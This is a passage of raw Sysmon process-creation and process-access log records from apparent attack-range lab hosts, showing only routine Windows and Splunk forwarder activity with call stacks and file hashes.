22:13:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032988Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.350{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032987Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.350{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-370B-6013-8203-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000032986Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.350{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-370B-6013-8203-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000032985Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:31.351{FF16AF91-370B-6013-8203-00000000A401}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362414Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.961{8e433fbf-370c-6013-bf03-000000001100}67969992C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362413Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.805{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-370c-6013-bf03-000000001100}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362412Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.805{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362411Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.805{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362410Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.805{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362409Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.805{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362408Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.789{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-370c-6013-bf03-000000001100}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362407Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.789{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-370c-6013-bf03-000000001100}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362406Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.651{8e433fbf-370c-6013-bf03-000000001100}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033010Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.600{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-370C-6013-8403-00000000A401}5932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033009Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.600{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033008Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.600{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033007Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.600{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033006Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.600{FF16AF91-26B6-6013-0C00-00000000A401}6121092C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033005Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.600{FF16AF91-26B4-6013-0500-00000000A401}644760C:\Windows\system32\csrss.exe{FF16AF91-370C-6013-8403-00000000A401}5932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000033004Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.600{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-370C-6013-8403-00000000A401}5932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000033003Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:13:32.601{FF16AF91-370C-6013-8403-00000000A401}5932C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362405Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.148{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-370c-6013-be03-000000001100}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362404Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.148{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362403Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.148{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362402Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.148{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362401Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.148{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362400Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.148{8e433fbf-2a44-6013-0600-000000001100}756772C:\Windows\system32\csrss.exe{8e433fbf-370c-6013-be03-000000001100}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362399Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:32.148{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-370c-6013-be03-000000001100}6152C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 